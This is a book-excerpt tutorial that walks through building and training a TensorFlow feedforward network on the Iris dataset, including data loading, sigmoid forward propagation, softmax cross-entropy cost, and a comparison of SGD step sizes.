weighted_cross_entropy_with_logits( targets, logits, pos_weight, name=None ) targets: A tensor of the same type and shape as logits. logits: A tensor of type float32 or float64. pos_weight: A coefficient to use on the positive examples. This is similar to sigmoid_cross_entropy_with_logits() except that pos_weight allows a trade-off of recall and precision by up or down-weighting the cost of a positive error relative to a negative error. Analyzing the Iris dataset with a Tensorflow feedforward network Let's look at a feedforward example using the Iris dataset. You can download the dataset from https://github.com/ml-resources/neuralnetwork-programming/blob/ed1/ch02/iris/iris.csv and the target labels from https://github.com/ml-resources/neuralnetwork-programming/blob/ed1/ch02/iris/target.csv. In the Iris dataset, we will use 150 rows of data made up of 50 samples from each of three Iris species: Iris setosa, Iris virginica, and Iris versicolor. Petal geometry compared from three iris species: Iris Setosa, Iris Virginica, and Iris Versicolor. In the dataset, each row contains data for each flower sample: sepal length, sepal width, petal length, petal width, and flower species. Flower species are stored as integers, with 0 denoting Iris setosa, 1 denoting Iris versicolor, and 2 denoting Iris virginica. First, we will create a run() function that takes three parameters--hidden layer size h_size, standard deviation for weights stddev, and Step size of Stochastic Gradient Descent sgd_step: def run(h_size, stddev, sgd_step) Input data loading is done using the genfromtxt function in numpy. The Iris data loaded has a shape of L: 150 and W: 4. Data is loaded in the all_X variable. Target labels are loaded from target.csv in all_Y with the shape of L: 150, W:3: def load_iris_data(): from numpy import genfromtxt data = genfromtxt('iris.csv', delimiter=',') target = genfromtxt('target.csv', delimiter=',').astype(int) # Prepend the column of 1s for bias L, W = data.shape all_X = np.ones((L, W + 1)) all_X[:, 1:] = data num_labels = len(np.unique(target)) all_y = np.eye(num_labels)[target] return train_test_split(all_X, all_y, test_size=0.33, random_state=RANDOMSEED) Once data is loaded, we initialize the weights matrix based on x_size, y_size, and h_size with standard deviation passed to the run() method: x_size= 5 y_size= 3 h_size= 128 (or any other number chosen for neurons in the hidden layer) # Size of Layers x_size = train_x.shape[1] # Input nodes: 4 features and 1 bias y_size = train_y.shape[1] # Outcomes (3 iris flowers) # variables X = tf.placeholder("float", shape=[None, x_size]) y = tf.placeholder("float", shape=[None, y_size]) weights_1 = initialize_weights((x_size, h_size), stddev) weights_2 = initialize_weights((h_size, y_size), stddev) Next, we make the prediction using sigmoid as the activation function defined in the forward_propagration() function: def forward_propagation(X, weights_1, weights_2): sigmoid = tf.nn.sigmoid(tf.matmul(X, weights_1)) y = tf.matmul(sigmoid, weights_2) return y First, sigmoid output is calculated from input X and weights_1. This is then used to calculate y as a matrix multiplication of sigmoid and weights_2: y_pred = forward_propagation(X, weights_1, weights_2) predict = tf.argmax(y_pred, dimension=1) Next, we define the cost function and optimization using gradient descent. Let's look at the GradientDescentOptimizer being used. It is defined in the tf.train.GradientDescentOptimizer class and implements the gradient descent algorithm. To construct an instance, we use the following constructor and pass sgd_step as a parameter: # constructor for GradientDescentOptimizer __init__( learning_rate, use_locking=False, name='GradientDescent' ) Arguments passed are explained here: learning_rate: A tensor or a floating point value. The learning rate to use. use_locking: If True, use locks for update operations. name: Optional name prefix for the operations created when applying gradients. The default name is "GradientDescent". The following list shows the code to implement the cost function: cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=y_pred)) updates_sgd = tf.train.GradientDescentOptimizer(sgd_step).minimize(cost) Next, we will implement the following steps: Initialize the TensorFlow session: sess = tf.Session() Initialize all the variables using tf.initialize_all_variables(); the return object is used to instantiate the session. Iterate over steps (1 to 50). For each step in train_x and train_y, execute updates_sgd. Calculate the train_accuracy and test_accuracy. We stored the accuracy for each step in a list so that we could plot a graph: init = tf.initialize_all_variables() steps = 50 sess.run(init) x = np.arange(steps) test_acc = [] train_acc = [] print("Step, train accuracy, test accuracy") for step in range(steps): # Train with each example for i in range(len(train_x)): sess.run(updates_sgd, feed_dict={X: train_x[i: i + 1], y: train_y[i: i + 1]}) train_accuracy = np.mean(np.argmax(train_y, axis=1) == sess.run(predict, feed_dict={X: train_x, y: train_y})) test_accuracy = np.mean(np.argmax(test_y, axis=1) == sess.run(predict, feed_dict={X: test_x, y: test_y})) print("%d, %.2f%%, %.2f%%" % (step + 1, 100. * train_accuracy, 100. * test_accuracy)) test_acc.append(100. * test_accuracy) train_acc.append(100. * train_accuracy) Code execution Let's run this code for h_size of 128, standard deviation of 0.1, and sgd_step of 0.01: def run(h_size, stddev, sgd_step): ... def main(): run(128,0.1,0.01) if __name__ == '__main__': main() The preceding code outputs the following graph, which plots the steps versus the test and train accuracy: Let's compare the change in SGD steps and its effect on training accuracy. The following code is very similar to the previous code example, but we will rerun it for multiple SGD steps to see how SGD steps affect accuracy levels. def run(h_size, stddev, sgd_steps): .... test_accs = [] train_accs = [] time_taken_summary = [] for sgd_step in sgd_steps: start_time = time.time() updates_sgd = tf.train.GradientDescentOptimizer(sgd_step).minimize(cost) sess = tf.Session() init = tf.initialize_all_variables() steps = 50 sess.run(init) x = np.arange(steps) test_acc = [] train_acc = [] print("Step, train accuracy, test accuracy") for step in range(steps): # Train with each example for i in range(len(train_x)): sess.run(updates_sgd, feed_dict={X: train_x[i: i + 1], y: train_y[i: i + 1]}) train_accuracy = np.mean(np.argmax(train_y, axis=1) == sess.run(predict, feed_dict={X: train_x, y: train_y})) test_accuracy = np.mean(np.argmax(test_y, axis=1) == sess.run(predict, feed_dict={X: test_x, y: test_y})) print("%d, %.2f%%, %.2f%%" % (step + 1, 100. * train_accuracy, 100. * test_accuracy)) #x.append(step) test_acc.append(100. * test_accuracy) train_acc.append(100. * train_accuracy) end_time = time.time() diff = end_time -start_time time_taken_summary.append((sgd_step,diff)) t = [np.array(test_acc)] t.append(train_acc) train_accs.append(train_acc) Output of the preceding code will be an array with training and test accuracy for each SGD step value. In our example, we called the function sgd_steps for an SGD step value of [0.01, 0.02, 0.03]: def main(): sgd_steps = [0.01,0.02,0.03] run(128,0.1,sgd_steps) if __name__ == '__main__': main() This is the plot showing how training accuracy changes with sgd_steps. For an SGD value of 0.03, it reaches a higher accuracy faster as the step size is larger. In this post, we built our first neural network, which was feedforward only, and used it for classifying the contents of the Iris dataset. You enjoyed a tutorial from the book, Neural Network Programming with Tensorflow. To implement advanced neural networks like CCNs, RNNs, GANs, deep belief networks and others in Tensorflow, grab your copy today! Neural Network Architectures 101: Understanding Perceptrons How to Implement a Neural Network with Single-Layer Perceptron Deep Learning Algorithms: How to classify Irises using multi-layer perceptrons
Read more
  • 0
  • 0
  • 15658
Modal Close icon
Modal Close icon